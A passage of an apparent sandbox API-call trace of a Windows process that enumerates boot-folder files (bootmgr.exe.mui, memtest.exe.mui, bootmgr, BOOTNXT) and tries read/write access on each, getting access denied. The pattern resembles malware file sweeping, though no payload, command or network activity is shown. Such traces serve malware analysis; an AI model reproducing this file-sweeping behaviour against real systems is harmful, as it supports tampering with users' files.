dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.643] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc498516b, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0084.643] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.643] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.643] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.643] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.643] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0084.643] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.643] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.643] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.643] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.643] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0084.643] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.643] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46a58 [0084.643] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0084.643] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0084.643] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.643] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.643] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.643] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0084.644] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.644] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.644] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.644] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.644] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.644] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.644] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0084.644] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.644] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.644] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0084.644] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0084.644] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.644] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.644] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.644] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.644] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0084.644] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.644] AreFileApisANSI () returned 1 [0084.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\zh-TW\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\zh-TW\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0084.644] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.644] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.644] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.644] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0084.644] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0084.644] AreFileApisANSI () returned 1 [0084.644] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0084.644] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53298 [0084.644] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned 30 [0084.645] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.645] GetFileType (hFile=0x364) returned 0x1 [0084.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0084.645] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0084.645] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0084.645] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0084.645] CloseHandle (hObject=0x364) returned 1 [0084.645] AreFileApisANSI () returned 1 [0084.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0084.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53490 [0084.646] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x53490, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned 30 [0084.646] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.646] GetLastError () returned 0x5 [0084.646] GetLastError () returned 0x5 [0084.646] SetLastError (dwErrCode=0x5) [0084.646] GetLastError () returned 0x5 [0084.646] SetLastError (dwErrCode=0x5) [0084.646] GetLastError () returned 0x5 [0084.646] SetLastError (dwErrCode=0x5) [0084.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0084.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0084.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0084.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.646] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.646] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.646] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa598, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0084.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0084.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0084.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0084.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0084.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0084.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0084.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0084.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0084.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0084.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0084.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0084.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0084.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0084.647] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.647] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.647] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.647] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0084.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.647] AreFileApisANSI () returned 1 [0084.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\zh-TW\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\zh-TW\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0084.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.647] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.647] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0084.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0084.647] AreFileApisANSI () returned 1 [0084.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0084.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53718 [0084.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x53718, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\zh-TW\\memtest.exe.mui") returned 30 [0084.648] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\memtest.exe.mui" (normalized: "c:\\boot\\zh-tw\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.648] GetFileType (hFile=0x364) returned 0x1 [0084.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0084.648] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0084.648] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0084.648] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0084.648] CloseHandle (hObject=0x364) returned 1 [0084.649] AreFileApisANSI () returned 1 [0084.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0084.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53838 [0084.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x53838, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\zh-TW\\memtest.exe.mui") returned 30 [0084.649] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\memtest.exe.mui" (normalized: "c:\\boot\\zh-tw\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.649] GetLastError () returned 0x5 [0084.649] GetLastError () returned 0x5 [0084.649] SetLastError (dwErrCode=0x5) [0084.649] GetLastError () returned 0x5 [0084.649] SetLastError (dwErrCode=0x5) [0084.649] GetLastError () returned 0x5 [0084.649] SetLastError (dwErrCode=0x5) [0084.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0084.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0084.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0084.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.649] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.649] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.649] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x690d8, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧ꖘ")) returned 0 [0084.649] FindClose (in: hFindFile=0x78950 | out: hFindFile=0x78950) returned 1 [0084.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0084.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0084.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0084.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0084.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0084.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0084.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0084.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0084.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0084.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ba8 | out: hHeap=0x20000) returned 1 [0084.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0084.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0084.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0084.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0084.650] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.650] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.650] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.650] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.650] AreFileApisANSI () returned 1 [0084.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\bootmgr", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\bootmgr", lpUsedDefaultChar=0x0) returned 11 [0084.650] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.650] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0084.650] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0084.651] AreFileApisANSI () returned 1 [0084.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0084.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x16) returned 0x5c940 [0084.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x5c940, cchWideChar=11 | out: lpWideCharStr="C:\\bootmgr") returned 11 [0084.651] CreateFileW (lpFileName="C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0084.651] GetFileType (hFile=0x424) returned 0x1 [0084.651] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.651] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0084.651] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0084.651] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0084.652] CloseHandle (hObject=0x424) returned 1 [0084.652] AreFileApisANSI () returned 1 [0084.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0084.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x16) returned 0x5cc20 [0084.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x5cc20, cchWideChar=11 | out: lpWideCharStr="C:\\bootmgr") returned 11 [0084.652] CreateFileW (lpFileName="C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.652] GetLastError () returned 0x5 [0084.652] GetLastError () returned 0x5 [0084.652] SetLastError (dwErrCode=0x5) [0084.652] GetLastError () returned 0x5 [0084.652] SetLastError (dwErrCode=0x5) [0084.652] GetLastError () returned 0x5 [0084.652] SetLastError (dwErrCode=0x5) [0084.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0084.652] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.652] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.652] FindNextFileW (in: hFindFile=0x78850, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xe5533ee0, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef9d0a0c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="BOOTNXT", cAlternateFileName="")) returned 1 [0084.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0084.652] RtlAllocateHeap 